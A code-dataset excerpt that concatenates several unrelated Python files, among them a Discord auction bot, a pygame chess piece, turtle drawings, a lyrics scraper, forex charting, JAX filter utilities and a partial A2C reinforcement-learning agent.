f'{player1_value/100}Cr', player2_name)
embed = discord.Embed(title="Trade Successful",
color=discord.Color.green())
embed.add_field(
name=f"Trade Details",
value=f"**{player2_name}** from **{team2_name}** bought for **{player1_value/100}Cr** by **{team1_name}**."
)
await channel.send(embed=embed)
return
if player2_name.isnumeric():
player2_value = int(player2_name)
player1_value = teams[team1_name][player1_name]
if (purse[team2_name] - player2_value/100 < 0):
embed = discord.Embed(
title="Trade Failed", color=discord.Color.red())
embed.add_field(name="Error",
value=f"**{team2_name}** cannot afford this trade.")
await channel.send(embed=embed)
return
del teams[team1_name][player1_name]
teams[team2_name][player1_name] = player1_value
purse[team1_name] = purse[team1_name] + player2_value / 100
purse[team2_name] = purse[team2_name] - player2_value / 100
add_trade(full_team_names[team2_name], full_team_names[team1_name],
f'{player2_value/100}Cr', player1_name)
embed = discord.Embed(title="Trade Successful",
color=discord.Color.green())
embed.add_field(
name=f"Trade Details",
value=f"**{player1_name}** from **{team1_name}** bought for **{player2_value/100}Cr** by **{team2_name}**."
)
await channel.send(embed=embed)
return
# Check if both teams exist
if team1_name not in teams or team2_name not in teams:
embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
embed.add_field(name="Error",
value="One or both of the teams do not exist.")
await channel.send(embed=embed)
return
# Check if both players exist in their respective teams
if player1_name not in teams[team1_name] or player2_name not in teams[
team2_name]:
embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
embed.add_field(
name="Error",
value="One or both of the players do not exist in their respective teams.")
await channel.send(embed=embed)
return
# Calculate the values of the players
player1_value = teams[team1_name][player1_name]
player2_value = teams[team2_name][player2_name]
# Check if both teams can afford the trade
if (purse[team1_name] + player1_value / 100 - player2_value / 100 < 0) or (
purse[team2_name] + player2_value / 100 - player1_value / 100 < 0):
embed = discord.Embed(title="Trade Failed", color=discord.Color.red())
embed.add_field(name="Error",
value="One or both teams cannot afford this trade.")
await channel.send(embed=embed)
return
# Perform the trade
del teams[team1_name][player1_name]
del teams[team2_name][player2_name]
teams[team1_name][player2_name] = player2_value
teams[team2_name][player1_name] = player1_value
# Update purse balances
purse[team1_name] = purse[
team1_name] + player1_value / 100 - player2_value / 100
purse[team2_name] = purse[
team2_name] + player2_value / 100 - player1_value / 100
# Log the trade
add_trade(full_team_names[team1_name], full_team_names[team2_name],
player1_name, player2_name)
# Send a trade success embed
embed = discord.Embed(title="Trade Successful",
color=discord.Color.green())
embed.add_field(
name=f"Trade Details",
value=f"{player1_name} from {team1_name} traded for {player2_name} from {team2_name}."
)
await channel.send(embed=embed)
if sales_channel:
await sales_channel.send(embed=embed) # type: ignore
##################################################################
# Complete Sale:
##################################################################
async def complete_sale(channel):
global auction_sets
global teams
global purse
global sale_history
# Create an embed for the confirmation message
confirmation_embed = discord.Embed(
title=f'Ongoing bid: **{current_player}**',
description=f'**{current_player}** is currently being bid for.',
color=discord.Color.red())
confirmation_embed.add_field(name="Do you wish to mark as Unsold?:",
value="Please confirm or deny this request.",
inline=False)
# Send the confirmation embed
confirmation_message = await channel.send(embed=confirmation_embed)
confirm = Button(style=discord.ButtonStyle.green, label="Confirm")
cancel = Button(style=discord.ButtonStyle.red, label="Cancel")
view = View()
view.add_item(confirm)
view.add_item(cancel)
await confirmation_message.edit(view=view)
# Define a check function to check which button they clicked
async def confirmed(interaction):
await unsold(channel)
await confirmation_message.delete()
return
async def cancel_check(interaction):
cancel_embed = discord.Embed(title="Player Still On Sale",
description="Unsold marking canceled.",
color=discord.Color.red())
await channel.send(embed=cancel_embed)
await confirmation_message.delete()
return
confirm.callback = confirmed
cancel.callback = cancel_check
##################################################################
# Export to csv
##################################################################
async def export(channel):
global teams
with open(f'cricket_data.csv', 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["Name"])
for team_name, players in teams.items():
for player, price in players.items():
writer.writerow([player])
await channel.send(file=discord.File(f'cricket_data.csv'))
return
##################################################################
# Showing Help:
##################################################################
async def show_help(channel):
embed = discord.Embed(title='Help Commands for Auctioneer:',
description='Here are the available commands:',
color=discord.Color.red())
embed.add_field(name='$add <shorthand> <color> <team_name>',
value='Creates a new team with the given name.',
inline=False)
embed.add_field(name='$sell <team> <price> <player>',
value='Sells a player to a team.',
inline=False)
embed.add_field(name='$sold <team> <price>',
value='Sells the current player to a team.',
inline=False)
embed.add_field(name='$trade <team1> <team2> <player1>/<player2>',
value='Trades a player from one team to another.\nPurchases one player from other team if one of the player fields is a number, in Lakhs', inline=False)
embed.add_field(name='$<set_name>',
value='Displays a random player from the set.',
inline=False)
embed.add_field(name='$removeplayer <team> <player>',
value='Removes a player from a team.',
inline=False)
embed.add_field(name='$removeteam <team>',
value='Removes a team.', inline=False)
embed.add_field(name='$reset', value='Resets all the sets.', inline=False)
embed.add_field(name='$setmaxpurse <value>',
value='Sets the maximum purse value. Default 100',
inline=False)
embed.add_field(name='$setmaxplayers <value>',
value='Sets the maximum players value. Default 25',
inline=False)
embed.add_field(name='$unsold',
value='Marks the current player as unsold.',
inline=False)
embed.add_field(name='$getunsold',
value='Gets a player from the unsold list.',
inline=False)
embed.add_field(
name='$export', value='Exports the data to a csv file.', inline=False)
await channel.send(embed=embed)
embed = discord.Embed(title='Help Commands for All Users:',
description='Here are the available commands:',
color=discord.Color.brand_green())
embed.add_field(name='$request <player>',
value='Shows the player if available.',
inline=False)
embed.add_field(name='$showunsold',
value='Shows all the unsold players.',
inline=False)
embed.add_field(name='$teams', value='Shows all the teams.', inline=False)
embed.add_field(name='$<team>',
value='Shows information about a team.',
inline=False)
embed.add_field(
name='$help', value='Shows this help message.', inline=False)
embed.add_field(name='$sets', value='Shows all the sets.', inline=False)
embed.add_field(name='$set <set_name>',
value='Shows the set with the given name.',
inline=False)
embed.add_field(
name='$timer <value>',
value='Sets a timer for entered seconds. 10 seconds if no input.',
inline=False)
embed.add_field(name='$sales',
value='Shows the history of sales and trades.',
inline=False)
embed.add_field(name='$notify <player(s) seperated by comma>',
value='Notifies you when the player is live in the auction.(Can use in DM)', inline=False)
await channel.send(embed=embed)
@client.event
async def on_disconnect():
global teams, purse, auction_sets, sale_history, unsold_players, full_team_names, team_colors, current_player_price, current_player, current_auction_set, filename, pkls
save_data({
'teams': teams,
'purse': purse,
'auction_sets': auction_sets,
'sale_history': sale_history,
'unsold_players': unsold_players,
'full_team_names': full_team_names,
'team_colors': team_colors,
'current_auction_set': current_auction_set,
'current_player': current_player,
'current_player_price': current_player_price,
})
client.run(os.environ['TOKEN'])
| Hydraknight/AuctioneerDiscordBot | auction.py | auction.py | py | 62,558 | python | en | code | 0 | github-code | 13 |
13432993855 | import os
import pygame as pg
from utils.colors import *
class Piece:
def __init__(self):
self.is_white = True
self.x, self.y = 0,0
self.board_pos = (0,0)
self.board_x, self.board_y = self.board_pos
self.pos = (self.x, self.y)
self.texture = None
self.rect = pg.Rect(self.pos, (64,64))
self.moves = []
self.moves_rect = []
self.selected = False
self.hover = False
self.selection_circle = pg.Surface((64,64))
self.selection_circle.set_colorkey(BLACK)
self.selection_circle.set_alpha(128)
self.selected_move = -1
def draw(self, screen, mousepos):
self.hover = False
self.rect.x = (screen.get_size()[0]-512)//2 + (64 * self.board_x)
self.rect.y = (screen.get_size()[1]-512)//2 + (64 * self.board_y)
screen.blit(self.texture, (self.rect.x, self.rect.y))
if self.rect.collidepoint(mousepos):
self.hover = True
pg.draw.circle(self.selection_circle, SELECT, (32,32), 16)
screen.blit(self.selection_circle, (self.rect.x, self.rect.y))
# (screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])
def draw_moves(self, screen, mousepos):
self.selected_move = -1
if self.selected:
for move in self.moves:
pg.draw.circle(self.selection_circle, SELECT, (32,32), 16)
screen.blit(self.selection_circle, ((screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])))
for i in range(len(self.moves_rect)):
if self.moves_rect[i].collidepoint(mousepos):
self.selected_move = i
def click(self, screen):
self.moves_rect = []
print(self.board_x, self.board_y)
self.selected = True
if self.__str__() == 'bP': # Black Peon
self.moves = [[self.board_y+1, self.board_x]]
if self.board_y == 1:
self.moves += [[self.board_y+2, self.board_x]]
elif self.__str__() == 'wP': # White Peon
self.moves = [[self.board_y-1, self.board_x]]
if self.board_y == 6:
self.moves += [[self.board_y-2, self.board_x]]
elif self.__str__()[1] == 'K': # Knight
pass
for move in self.moves:
self.moves_rect += [pg.Rect(((screen.get_size()[0]-512)//2 + (64 * move[1]) , (screen.get_size()[1]-512)//2 + (64 * move[0])), (64,64))]
print(self.moves_rect)
class Peon(Piece):
def __init__(self, is_white, pos, board_pos):
super().__init__()
self.is_white = is_white
self.x, self.y = pos[1], pos[0]
self.board_x, self.board_y = board_pos[0], board_pos[1]
self.pos = pos
self.rect = pg.Rect(self.pos, (64,64))
if is_white:
self.texture = pg.image.load(os.path.join('assets', 'img', 'wPeon.png'))
self.moves = None
else:
self.texture = pg.image.load(os.path.join('assets', 'img', 'bPeon.png'))
def __str__(self):
if self.is_white:
return 'wP'
return 'bP' | Thinato/pygame-Chess | piece.py | piece.py | py | 2,825 | python | en | code | 0 | github-code | 13 |
31009696143 | import turtle
turtle.screensize(canvwidth=2000, canvheight=2000,
bg="black")
i = turtle.Turtle()
i.penup()
i.speed(5)
i.backward(600)
i.left(90)
i.forward(100)
i.right(90)
i.pendown()
i.pencolor("white")
i.hideturtle()
i.left(180)
i.penup()
i.hideturtle()
i.circle(-30,90)
i.pendown()
i.showturtle()
i.speed(20)
s = 10
def ifun1():
for x in range(s):
i.circle(-30,-90)
i.backward(180)
i.circle(30,-90)
i.left(90)
i.forward(1)
i.right(90)
i.circle(29,90)
i.forward(180)
i.circle(-30,90)
def ifun2():
for q in range(s*s):
i.left(90)
i.forward(1)
i.left(90)
i.forward(20)
i.right(90)
i.forward(1)
i.left(90)
i.backward(20)
i.left(180)
if q >= s*10-1:
i.forward(90)
i.circle(-30,90)
ifun1()
ifun1()
i.circle(-30,-90)
i.backward(90)
ifun2()
i.right(90)
i.penup()
i.forward(410)
i.left(90)
i.forward(170)
i.pendown()
i.right(90)
def ss():
for s in range(10):
i.left(135)
i.circle(100,270)
i.left(90)
i.forward(1)
i.right(90)
i.circle(100,-270)
i.right(135)
def dd():
for d in range(10):
i.backward(300)
i.right(90)
i.forward(1)
i.left(90)
i.forward(300)
def aa():
for ff in range(10):
i.forward(60)
i.left(90)
i.forward(1)
i.right(90)
i.backward(60)
def funR():
for x in range(15):
i.circle(-131,90)
i.right(90)
i.forward(1)
i.left(90)
i.circle(-131,-90)
# aa
def afun():
for a in range(20):
i.left(90)
i.circle(-80,180)
i.forward(150)
i.circle(80,90)
i.right(90)
i.forward(1)
i.left(90)
i.circle(81,-90)
i.backward(150)
i.circle(-80,-180)
i.right(90)
if a >= 20-1 :
i.left(90)
i.circle(-80,180)
i.forward(150)
for d in range(20):
i.circle(-80,180)
i.right(90)
i.forward(1)
i.left(90)
i.circle(-80,180)
# aa
ss()
i.left(90)
i.forward(20)
dd()
i.backward(300)
i.right(30)
aa()
i.penup()
i.right(60)
i.right(180)
i.backward(50)
i.right(90)
i.forward(350)
i.pendown()
dd()
i.backward(300)
i.forward(30)
i.left(90)
i.forward(10)
i.right(90)
i.left(90)
ss()
i.penup()
i.backward(200)
i.right(90)
i.forward(200)
i.pendown()
i.right(90)
afun()
i.penup()
i.backward(200)
i.right(180)
i.right(90)
i.forward(90)
i.left(90)
# i.forward()
i.pendown()
# a
dd()
i.right(180)
i.forward(140)
i.left(180)
funR()
# v
i.penup()
i.right(90)
i.forward(150)
i.left(90)
i.forward(150)
i.right(90)
i.left(100)
i.pendown()
dd()
i.penup()
i.right(100)
i.forward(98)
i.pendown()
i.right(280)
dd()
# E
def efun():
for x in range(100):
i.circle(-110,330)
i.circle(-109.8,-330)
if x >= 100 - 1:
i.circle(-109.8,150)
i.right(90)
for d in range(10):
i.forward(220)
i.right(90)
i.forward(1)
i.right(90)
i.forward(220)
i.left(90)
i.left(90)
i.penup()
i.right(80)
i.right(90)
i.forward(200)
i.left(90)
i.forward(200)
i.right(120)
i.pendown()
# i.left(150)
# i.forward(200)
efun()
# i.hideturtle()
turtle.done() | dmahesh9810/python-Turtle | iqBrave.py | iqBrave.py | py | 3,501 | python | en | code | 0 | github-code | 13 |
28517672074 | import os
import sys
import pickle
import argparse
import torch
from torchvision import transforms, utils
sys.path.append('skip-thoughts.torch/pytorch')
from constants import *
from data_pipeline import *
from model import *
from skipthoughts import *
from train import Trainer
from pytorch_pretrained_bert.modeling import BertModel, BertPreTrainedModel
from pytorch_pretrained_bert.modeling_openai import OpenAIGPTModel, OpenAIGPTPreTrainedModel
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--output-folder', type=str, required=True,
help='Output folder name')
parser.add_argument('--model-path', type=str, required=True,
help='Path to model files')
parser.add_argument('--text1', type=str, required=True)
parser.add_argument('--text2', type=str, required=True)
parser.add_argument('--use-skip-thought', action='store_true',
help='use pretrained skip thought embedding')
parser.add_argument('--use-bert', action='store_true',
help='use pretrained BERT embedding')
parser.add_argument('--use-gpt', action='store_true',
help='use pretrained GPT embedding')
parser.add_argument('--hidden-dim', type=int, default=1024,
help='RNN hidden dim size')
parser.add_argument('--embed-size', type=int, default=1024,
help='Word embed size')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print("Using device {}".format(device))
with open(FLOWERS_DATA_ROOT + 'idx_to_word.pkl', 'rb') as f:
idx_to_word = pickle.load(f)
with open(FLOWERS_DATA_ROOT + 'word_to_idx.pkl', 'rb') as f:
word_to_idx = pickle.load(f)
train_val_dataset = FlowerDataset(
img_folder=FLOWERS_DATA_ROOT + 'jpg',
text_folder=FLOWERS_DATA_ROOT + 'train_val',
word_to_idx=word_to_idx,
idx_to_word=idx_to_word,
)
if args.use_skip_thought:
model = BayesianUniSkip('data/skip_thoughts', word_to_idx.keys())
elif args.use_bert:
model = BertModel.from_pretrained('bert-base-uncased')
model.eval()
elif args.use_gpt:
model = OpenAIGPTModel.from_pretrained('openai-gpt')
model.eval()
else:
model = RnnEncoder(dict_size=len(word_to_idx),
embed_size=args.embed_size,
hidden_dim=args.hidden_dim,
drop_prob=0.5)
generator = Generator()
discriminator = Discriminator()
dataloader = torch.utils.data.DataLoader(train_val_dataset,
batch_size=1,
shuffle=True)
model = model.to(device)
generator = generator.to(device)
discriminator = discriminator.to(device)
trainer = Trainer(dataloader, model, generator, discriminator, None, None, 1, device, None)
print("Loading model files")
trainer.load_model(args.model_path)
print("Generating image from text")
trainer.interpolate(args.text1, args.text2, args.output_folder)
print("Images saved to {}".format(args.output_folder))
| lin-david/text2image | interpolate.py | interpolate.py | py | 3,269 | python | en | code | 0 | github-code | 13 |
73117872977 | class Solution:
def isValid(self, s: str) -> bool:
stack = []
mapping = {'}': '{', ')': '(', ']': '['}
for ch in s:
if ch in ['(', '{', '[']:
stack.append(ch)
else:
if not stack:
return False
elif not stack[-1] == mapping[ch]:
return False
else:
stack.pop(-1)
return len(stack) == 0 | abaksy/leetcode-sol | 020/validParentheses.py | validParentheses.py | py | 466 | python | en | code | 1 | github-code | 13 |
14645360815 | from sqlalchemy import Column, Identity, Integer, Table, list
from . import metadata
BalanceDetailJson = Table(
"balance_detailjson",
metadata,
Column("available", list, comment="Funds that are available for use"),
Column("id", Integer, primary_key=True, server_default=Identity()),
)
__all__ = ["balance_detail.json"]
| offscale/stripe-sql | stripe_openapi/balance_detail.py | balance_detail.py | py | 337 | python | en | code | 1 | github-code | 13 |
4965118748 | # coding: utf-8
# In[1]:
import pandas as pd
from pandas_highcharts.display import display_charts
import os
class financeMain:
pairList={}
currencyList=[]
def __init__(self):
self.OpenAllFile(r'C:\\Users\\simnk\\workspace\\finance\\HISTDATA2015', 'H')
#全ファイルを開いてデータを展開
@classmethod
def OpenAllFile(self,directory,tf):
fileNames = os.listdir(directory)
for fileName in fileNames:
pair=fileName[10:16]
histData = pd.read_csv(directory + r'\\' + fileName, sep=';',
names=('Time','Open','High','Low','Close', ''),
index_col='Time', parse_dates=True)
histData.index += pd.offsets.Hour(7) #7時間のオフセット
#描画に時間がかかるので1時間足に変換
#0 +-1 に編集
self.pairList[pair]=self.TranData(self.TF_ohlc(histData, 'H'))
# dfのデータからtfで指定するタイムフレームの4本足データを作成する関数
@classmethod
def TF_ohlc(self, df, tf):
#x = df.resample(tf).ohlc()
x = df.resample(tf).ohlc()
O = x['Open']['open']
H = x['High']['high']
L = x['Low']['low']
C = x['Close']['close']
ret = pd.DataFrame({'Open': O, 'High': H, 'Low': L, 'Close': C},
columns=['Open','High','Low','Close'])
return ret.dropna()
#最初の値を100として割合に整形する関数
@classmethod
def TranData(self, histData):
haba=histData['Close'][0]
histData=histData/haba -1
return histData
#全通貨の相対価値を表示するチャート
def ShowVersusAll(self):
currencies=[]
for key in self.pairList.keys():
forward=key[:3]
backward=key[3:6]
if not forward in currencies:
self.ShowVersusCurrency(forward)
currencies.append(forward)
if not backward in currencies:
self.ShowVersusCurrency(backward)
currencies.append(backward)
#指定した通貨の相対価値を表示するチャート
@classmethod
def ShowVersusCurrency(self, currency):
versusList={}
for key in self.pairList.keys():
forward=key[:3]
backward=key[3:6]
strVs='VS. '
if forward==currency:
# 前半がキー
versusList[strVs + backward]=self.pairList[key]['Close']
elif backward==currency:
# 後半がキー
# 反転して格納
versusList[strVs + forward]=self.pairList[key]['Close'] * -1
df = pd.DataFrame(versusList)
display_charts(df, chart_type="stock", title=currency+' '+strVs, grid=True)
return df
#全ペアのチャートを表示
@classmethod
def ShowAll(self):
df = pd.DataFrame({'EURUSD': self.pairList['EURUSD']['Close'],
'EURJPY': self.pairList['EURJPY']['Close'],
'USDJPY': self.pairList['USDJPY']['Close']})
display_charts(df, chart_type="stock", title="MA cross", grid=True)
#指定したペアのチャートを表示
@classmethod
def Show(self, pair):
df = pd.DataFrame({pair: self.pairList[pair]['Close']})
display_charts(df, chart_type="stock", title="MA cross", grid=True)
| KaiShimanaka/finance | financeMain.py | financeMain.py | py | 3,597 | python | en | code | 2 | github-code | 13 |
29278167162 | import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
training_data = pd.read_csv('datasets/new_train.csv').sample(frac=1).reset_index(drop=True)
# Official Kaggle test
test_data = pd.read_csv('datasets/new_test.csv')
test_kaggle = test_data.drop(columns = ['Id','day','month','hour'])
#test_kaggle = sc.fit_transform(test_kaggle)
train_y = training_data.iloc[:,11:12].values
train_x = training_data.drop(columns = ['Id','label','day','month','hour'])
# Encode on both th training data and the test
X = train_x.append(test_kaggle, ignore_index = True).values
ohe = OneHotEncoder()
ohe.fit(X)
train_x = train_x.values
test_kaggle = ohe.transform(test_kaggle.values)
train_x = ohe.transform(train_x)
train_y = ohe.fit_transform(train_y)
'''
sc = StandardScaler()
train_x = sc.fit_transform(train_x)
train_x = sc.fit_transform(test_kaggle)'''
train_x, test_x, train_y, test_y = train_test_split(train_x, train_y, test_size = 0.1)
# Neural network
model = Sequential()
#model.add(Dropout(0.2, input_shape = (10,)))
model.add(Dropout(0.33, input_shape = (26586,)))
#model.add(Dense(10, input_dim=10, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(4, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# training
history = model.fit(train_x, train_y, epochs=5, batch_size=64)
# test
pred_test = model.predict(test_x)
# Results
#Converting predictions to label
pred = list()
for i in range(len(pred_test)):
pred.append(np.argmax(pred_test[i]))
#Converting one hot encoded test label to label
test = list()
for i in range(test_y.shape[0]):
test.append(np.argmax(test_y[i]))
# Accuracy
a = accuracy_score(pred,test)
print('Accuracy is:', a*100)
pred_kaggle = model.predict(test_kaggle)
# Results
#Converting predictions to label
pred = list()
for i in range(len(pred_kaggle)):
pred.append(np.argmax(pred_kaggle[i]))
pred_to_submit = pd.DataFrame(pred, columns=['label'])
pred_to_submit.to_csv("datasets/neural_networks_submission.csv", index=True, index_label='Id')
| MerlinEgalite/mail-classification | neural_network.py | neural_network.py | py | 2,402 | python | en | code | 0 | github-code | 13 |
22846164843 | # Get lyrics delivered to your CLI
import requests
from bs4 import BeautifulSoup
def lyrics_find(Artist, Song):
# Base URL to build on
URL = 'https://www.azlyrics.com/lyrics/'
# Modify Artist Name and Song Title to URL Format
Artist = Artist.lower().replace(" ","")
Song = Song.lower().replace(" ","")
# So our Bot doesn't get classified as a Bot
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
}
# Get Page from AZLyrics.
# Raise Exception If Page doesn't exist.
try:
page = requests.get(URL+Artist+'/'+Song+'.html', headers=headers)
if not page:
raise Exception(page.status_code)
except Exception as err:
print("Cannot Find Song. Please Check The Artist's Name and Song Title. Response Status Code: " + str(err))
return page.status_code
# Parse HTML to Soup
soup = BeautifulSoup(page.content, 'html.parser')
# Find All Divs With No Class Name
div_with_no_names = soup.findAll('div', class_=None)
# Find Lyrics Div From All Divs
for index, divs in enumerate(div_with_no_names):
if index == 1:
# Remove Unnecessary Tags
print(divs.text)
print('Lyrics From AZLyrics @ '+URL+Artist+'/'+Song+'.html')
return page.status_code
if __name__ == "__main__":
# Get Artist Name and Song Title
Artist = input("Artist: ")
Song = input("Song Title: ")
lyrics_find(Artist, Song)
| roopeshvs/LyricsPy | lyrics.py | lyrics.py | py | 1,533 | python | en | code | 0 | github-code | 13 |
36697692882 | from typing import Any, Callable, List, Optional, Tuple, Union
from typing_extensions import get_args
import jax
import jax.numpy as jnp
from .custom_types import Array, MoreArrays, PyTree, TreeDef
from .deprecated import deprecated
#
# Filter functions
#
_array_types = get_args(Array)
_morearray_types = get_args(MoreArrays)
_arraylike_types = _morearray_types + (int, float, complex, bool)
# TODO: not sure if this is the best way to do this? In light of:
# https://github.com/google/jax/commit/258ae44303b1539eff6253263694ec768b8803f0#diff-de759f969102e9d64b54a299d11d5f0e75cfe3052dc17ffbcd2d43b250719fb0
def is_array(element: Any) -> bool:
return isinstance(element, _array_types)
# Does _not_ do a try/except on jnp.asarray(element) because that's very slow.
def is_array_like(element: Any) -> bool:
return isinstance(element, _arraylike_types)
def is_inexact_array(element: Any) -> bool:
return is_array(element) and jnp.issubdtype(element.dtype, jnp.inexact)
def is_inexact_array_like(element: Any) -> bool:
return (
isinstance(element, _morearray_types)
and jnp.issubdtype(element.dtype, jnp.inexact)
) or isinstance(element, (float, complex))
#
# Filtering/combining
#
def _make_filter_tree(mask: Union[bool, Callable[[Any], bool]], arg: Any) -> bool:
if isinstance(mask, bool):
return mask
elif callable(mask):
return jax.tree_map(mask, arg)
else:
raise ValueError("`filter_spec` must consist of booleans and callables only.")
def filter(
pytree: PyTree, filter_spec: PyTree, inverse: bool = False, replace: Any = None
) -> PyTree:
inverse = bool(inverse) # just in case, to make the != trick below work reliably
filter_tree = jax.tree_map(_make_filter_tree, filter_spec, pytree)
return jax.tree_map(
lambda mask, x: x if bool(mask) != inverse else replace, filter_tree, pytree
)
def partition(pytree: PyTree, filter_spec: PyTree, replace: Any = None) -> PyTree:
filter_tree = jax.tree_map(_make_filter_tree, filter_spec, pytree)
left = jax.tree_map(lambda mask, x: x if mask else replace, filter_tree, pytree)
right = jax.tree_map(lambda mask, x: replace if mask else x, filter_tree, pytree)
return left, right
def _combine(*args):
for arg in args:
if arg is not None:
return arg
return None
def _is_none(x):
return x is None
def combine(*pytrees: PyTree):
return jax.tree_map(_combine, *pytrees, is_leaf=_is_none)
#
# Deprecated
#
@deprecated(in_favour_of=filter)
def split(
pytree: PyTree,
filter_fn: Optional[Callable[[Any], bool]] = None,
filter_tree: Optional[PyTree] = None,
) -> Tuple[List[Any], List[Any], List[bool], TreeDef]:
validate_filters("split", filter_fn, filter_tree)
flat, treedef = jax.tree_flatten(pytree)
flat_true = []
flat_false = []
if filter_fn is None:
which, treedef_filter = jax.tree_flatten(filter_tree)
if treedef != treedef_filter:
raise ValueError(
"filter_tree must have the same tree structure as the PyTree being split."
)
for f, w in zip(flat, which):
if w:
flat_true.append(f)
else:
flat_false.append(f)
else:
which = []
for f in flat:
if filter_fn(f):
flat_true.append(f)
which.append(True)
else:
flat_false.append(f)
which.append(False)
return flat_true, flat_false, which, treedef
@deprecated(in_favour_of=combine)
def merge(
flat_true: List[Any], flat_false: List[Any], which: List[bool], treedef: TreeDef
):
flat = []
flat_true = iter(flat_true)
flat_false = iter(flat_false)
for element in which:
if element:
flat.append(next(flat_true))
else:
flat.append(next(flat_false))
return jax.tree_unflatten(treedef, flat)
# Internal and only used by deprecated functions
def validate_filters(fn_name, filter_fn, filter_tree):
if (filter_fn is None and filter_tree is None) or (
filter_fn is not None and filter_tree is not None
):
raise ValueError(
f"Precisely one of `filter_fn` and `filter_tree` should be passed to {fn_name}"
)
| codeaudit/equinox | equinox/filters.py | filters.py | py | 4,344 | python | en | code | null | github-code | 13 |
37127807934 | #For loop with string.
# name= input("Enter your name. ")
# for ch in name:
# print(ch)
#For loop with list.
phone_no_list=[9847620206,9845007122,9826835932,9860181886,9844375899,9867773888]
for ph_no in phone_no_list:
print(ph_no)
#For loop with list of string
name_list=["Nirajan",'Saurav']
for name in name_list:
for char in name:
print(char)
print("\n")
#common for loop
#range function.
for num in range(10):
print(num)
#range function with initial and end (range(start, end)).
for num in range(5,10):
print(num)
# range function with initial, end and step (range(start, end, step)).
for num in range(5,10,2):
print(num)
prices=[30,59,75,68]
total=0
for price in prices:
total+=price
print("Total cost is ",total) | NirajanJoshi5059/python | for_loop.py | for_loop.py | py | 762 | python | en | code | 0 | github-code | 13 |
160299826 | """Implements the A2C Agent"""
# pylint: disable=E1129
import time
import tensorflow as tf
import numpy as np
from base_agent import BaseAgent
from layers import agent_network, fully_connected
from env_recorder import EnvRecorder
class A2CAgent(BaseAgent):
"""An Actor-Critic Advantage Network Agent"""
def __init__(self, env_factory, state_dir):
self.env_count = 16
self.t_steps = 5
self.gamma = 0.99
self.total_steps = 40e6
self.starting_lr = 1e-3
self.value_weight = 0.5
self.entropy_weight = 0.01
self.envs = []
self.start_time = time.time()
for _ in range(self.env_count):
env = env_factory()
self.envs.append(env)
env.info_cb = self.status
super().__init__(self.envs[0], state_dir)
print("A2C input shape ", self.state_shape)
def _build_model(self):
super()._build_model()
with self.graph.as_default():
with tf.variable_scope('network'):
input_layer, final_layer, predict_layer = agent_network(
state_shape=self.state_shape,
image_input=self.image_input,
action_count=self.action_count)
self.input_layer = input_layer
self.predict_layer = predict_layer
self.softmax_predict = tf.nn.softmax(self.predict_layer)
self.value_layer = fully_connected(
final_layer, 1, activation=None, name="value")
self.value_layer_val = self.value_layer[:, 0]
with tf.variable_scope('state'):
self._frames = tf.Variable(
0, trainable=False, name='frames', dtype=tf.int64)
tf.summary.scalar('frames', self._frames)
self.update_frames = tf.assign_add(self._frames,
tf.cast(tf.shape(self.input_layer)[0], tf.int64))
lr_calc = self.starting_lr * \
(1.0 - (tf.cast(self._frames, tf.float64) / self.total_steps))
# self.learning_rate = tf.maximum(tf.cast(0.0, tf.float64), lr_calc)
self.learning_rate = tf.constant(self.starting_lr)
tf.summary.scalar('learning_rate', self.learning_rate)
with tf.variable_scope('training'):
self.target_predict = tf.placeholder(
tf.int32, shape=[None], name='target_predict')
self.target_value = tf.placeholder(
tf.float32, shape=[None], name='target_value')
self.reward_diff = tf.placeholder(
tf.float32, shape=[None], name='reward_diff')
mse_value = tf.reduce_mean(tf.squared_difference(
self.value_layer, self.target_value) / 2.)
tf.summary.scalar('mse_value', mse_value)
diff_predict = tf.reduce_mean(
self.reward_diff * tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.predict_layer, labels=self.target_predict))
tf.summary.scalar('err_predict', diff_predict)
a0 = self.predict_layer - \
tf.reduce_max(self.predict_layer, axis=1, keep_dims=True)
ea0 = tf.exp(a0)
z0 = tf.reduce_sum(ea0, axis=1, keep_dims=True)
p0 = ea0 / z0
# entropy = tf.reduce_mean(-tf.reduce_sum(self.softmax_predict * tf.log( self.softmax_predict + 1e-6), axis=1)) # adding 1e-6 to avoid DBZ
entropy = tf.reduce_mean(tf.reduce_sum(
p0 * (tf.log(z0) - a0), axis=1))
tf.summary.scalar('predict_entropy', entropy)
trainer = tf.train.RMSPropOptimizer(
self.learning_rate, decay=0.99, epsilon=1e-5)
loss = diff_predict + self.value_weight * mse_value - self.entropy_weight * entropy
tf.summary.scalar('loss', loss)
# self.train_op = trainer.minimize(loss, global_step=self._step)
grads_and_vars = trainer.compute_gradients(loss)
grads, vars = zip(*grads_and_vars)
grads, _ = tf.clip_by_global_norm(grads, 0.5)
grads_and_vars = list(zip(grads, vars))
self.train_op = trainer.apply_gradients(
grads_and_vars, global_step=self._step)
with tf.variable_scope('stats'):
self.score_placeholder = tf.placeholder(
tf.float32, shape=[], name='score_input')
score_1 = tf.Variable(0., trainable=False, name='score_1')
tf.summary.scalar('score_1', score_1)
score_100 = tf.Variable(0., trainable=False, name='score_100')
tf.summary.scalar('score_100', score_100)
score_1000 = tf.Variable(
0., trainable=False, name='score_1000')
tf.summary.scalar('score_1000', score_1000)
self.set_scores = tf.group(
tf.assign(score_1, self.score_placeholder),
tf.assign(
score_100,
score_100 + (self.score_placeholder / 100.0) - (score_100 / 100.0)),
tf.assign(
score_1000,
score_1000 + (self.score_placeholder / 1000.0) - (score_1000 / 1000.0)),
)
@property
def frames(self):
return self.session.run(self._frames)
def status(self, env: EnvRecorder):
